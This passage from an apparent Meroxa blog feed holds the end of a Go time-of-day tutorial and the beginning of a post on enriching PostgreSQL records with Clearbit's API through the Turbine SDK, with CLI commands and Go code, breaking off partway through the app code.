&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;timeOfDay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;t &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	intTime&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; strconv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ParseInt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;t&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	ts &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Unix&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;intTime&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	splitAfternoon &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;
	splitEvening &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;17&lt;/span&gt;
	splitNight &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;21&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; splitAfternoon &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;morning&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;=&lt;/span&gt; splitAfternoon &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; splitEvening &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;afternoon&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;=&lt;/span&gt; splitEvening &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; splitNight &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;evening&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;night&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The function takes a Unix timestamp, converts it to a local time, and maps the hour to &lt;em&gt;morning, afternoon, evening&lt;/em&gt; or &lt;em&gt;night.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;You can find the full example for this data app on &lt;a href=&quot;https://github.com/meroxa/novelty/blob/main/app.go&quot;&gt;GitHub&lt;/a&gt;. We can&apos;t wait to see what you build 🚀&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Additional resources:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/MGNgED5V4FI&quot;&gt;Watch a replay&lt;/a&gt; of our Real-Time Categorical Data-Based Anomaly Detection webinar&lt;/li&gt;
&lt;li&gt;Join the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Meroxa Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Learn more about thatDot’s &lt;a href=&quot;https://www.thatdot.com/product/novelty-detector&quot;&gt;Novelty Detector&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Real-Time Data Enrichment for Data Activation Using Meroxa Turbine and Clearbit]]></title><description><![CDATA[By using Meroxa’s Turbine SDK, you can simplify the data activation process by reducing the need to use multiple point solutions for transformation and reverse ETL with code.]]></description><link>https://meroxa.com/blog/real-time-data-enrichment-for-data-activation-using-meroxa-turbine-and-clearbit</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-data-enrichment-for-data-activation-using-meroxa-turbine-and-clearbit</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 04 Aug 2022 16:44:20 GMT</pubDate><content:encoded>&lt;p&gt;Data activation, or reverse ETL, is the process of pulling data from your data warehouse and making it actionable by your business users in their preferred tooling. One of the main ingredients for data activation is data enrichment. Data enrichment enhances existing data by supplementing missing or incomplete data with information from internal or external sources.&lt;/p&gt;
&lt;p&gt;The diagram below shows a typical architecture for data activation. Once a data record reaches the warehouse, a service acts upon that record, enriches it with data (internal or external), and places it in whatever destination a stakeholder needs.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Untitled%20(2).png&quot; alt=&quot;Untitled (2)&quot;&gt;&lt;/p&gt;
&lt;p&gt;The data activation pattern can be used for a number of use cases, including the following:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Service&lt;/strong&gt; - Gather customer details, support history, and purchase activity all in one place to provide a more tailored experience&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sales&lt;/strong&gt; - Accessing more detailed information about leads and their engagement activity can increase conversions and renewals&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Marketing&lt;/strong&gt; - Create personalized and targeted campaigns based on activity to improve lead generation efforts&lt;/p&gt;
&lt;h2&gt;Using Meroxa to Simplify and Turbocharge Data Activation&lt;/h2&gt;
&lt;p&gt;By using Meroxa’s &lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine Application Framework&lt;/a&gt;, you can simplify the data activation process by reducing the need to use multiple point solutions for transformation and reverse ETL with code.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Untitled%20(3).png&quot; alt=&quot;Untitled (3)&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the above diagram, the Meroxa Turbine data app cleans and enriches events from various data sources in real time, so the data is already in a consumable format when it reaches the destination. This saves data-driven organizations considerable amounts of money, resources, and time.&lt;/p&gt;
&lt;h2&gt;Show Me the Code!&lt;/h2&gt;
&lt;p&gt;In this example, we use Go to pull records from a PostgreSQL database, enrich each record, and write it back into another table in the same PostgreSQL database. The destination can be any resource Meroxa officially supports, including Snowflake, S3, and Salesforce.&lt;/p&gt;
&lt;p&gt;💡 If you want to skip the tutorial and see the full example, check out the &lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/go/enrich&quot;&gt;GitHub repo&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dashboard.clearbit.com/docs&quot;&gt;Clearbit API key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://go.dev/learn/&quot;&gt;Go&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Adding a PostgreSQL Resource to the Meroxa Catalog&lt;/h3&gt;
&lt;p&gt;The first step in creating a data app is to add the PostgreSQL resource to the Meroxa catalog. If your database supports logical replication, set the metadata configuration value to &lt;code class=&quot;language-text&quot;&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Initializing a Turbine Data App&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init meroxa-clearbit &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; golang  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When you initialize the Turbine app, you’ll see that we include plenty of comments and boilerplate to help you get up and running. We’ll remove most of it for this example, but take a look around and even execute &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt; to see the output of our sample app.&lt;/p&gt;
&lt;h3&gt;Clearbit Helper Function&lt;/h3&gt;
&lt;p&gt;The helper below uses the &lt;code class=&quot;language-text&quot;&gt;clearbit-go&lt;/code&gt; package to wrap &lt;a href=&quot;https://dashboard.clearbit.com/docs#enrichment-api-combined-api&quot;&gt;Clearbit’s combined enrichment API&lt;/a&gt;. It takes an email address, looks up details on the associated person &lt;em&gt;and&lt;/em&gt; company, and returns the result as a nicely formatted &lt;code class=&quot;language-text&quot;&gt;UserDetails&lt;/code&gt; struct.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;github.com/clearbit/clearbit-go/clearbit&quot;&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;log&quot;&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;os&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; UserDetails &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	FullName        &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Location        &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Role            &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Seniority       &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Company         &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    GithubUser      &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    GithubFollowers &lt;span class=&quot;token builtin&quot;&gt;int&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;EnrichUserEmail&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;email &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;UserDetails&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	key &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Getenv&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;CLEARBIT_API_KEY&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    client &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; clearbit&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewClient&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;clearbit&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;WithAPIKey&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    results&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; resp&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;FindCombined&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    	clearbit&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;PersonFindParams&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    		Email&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error looking up email; resp: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; resp&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Status&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;UserDetails&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        FullName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;        results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Name&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;FullName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Location&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;        results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Location&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Role&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;            results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Employment&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Role&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Seniority&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;       results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Employment&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Seniority&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Company&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;         results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Company&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        GithubUser&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;      results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;GitHub&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Handle&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        GithubFollowers&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;GitHub&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Followers&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Modifying app.go&lt;/h3&gt;
&lt;p&gt;This section of the app defines the main topology of the data app. Here you can see that we’re referencing a collection (or &lt;em&gt;table&lt;/em&gt;) called &lt;code class=&quot;language-text&quot;&gt;user_activity&lt;/code&gt; from a resource named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;. This is specifically a PostgreSQL database with a table called &lt;code class=&quot;language-text&quot;&gt;user_activity&lt;/code&gt;, but Turbine (and the Meroxa platform) abstracts that away, so you only need to worry about the name of the resource and the collection you’re interested in accessing.&lt;/p&gt;
&lt;p&gt;We then &lt;em&gt;process&lt;/em&gt; that collection via &lt;code class=&quot;language-text&quot;&gt;EnrichUserData&lt;/code&gt; (detailed below) and ultimately output the results from &lt;code class=&quot;language-text&quot;&gt;db&lt;/code&gt; into a collection named &lt;code class=&quot;language-text&quot;&gt;user_activity_enriched&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;To call the Clearbit API, we have to provide an API key. The &lt;code class=&quot;language-text&quot;&gt;RegisterSecret&lt;/code&gt; method makes it available to the function by mirroring the environment variable into the function’s context.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	db&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    stream&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_activity&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// stream is a collection of records, can&apos;t be inspected directly&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;RegisterSecret&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;CLEARBIT_API_KEY&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// makes env var available to data app&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    res&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;stream&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; EnrichUserData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// function to be implemented&lt;/span&gt;
    
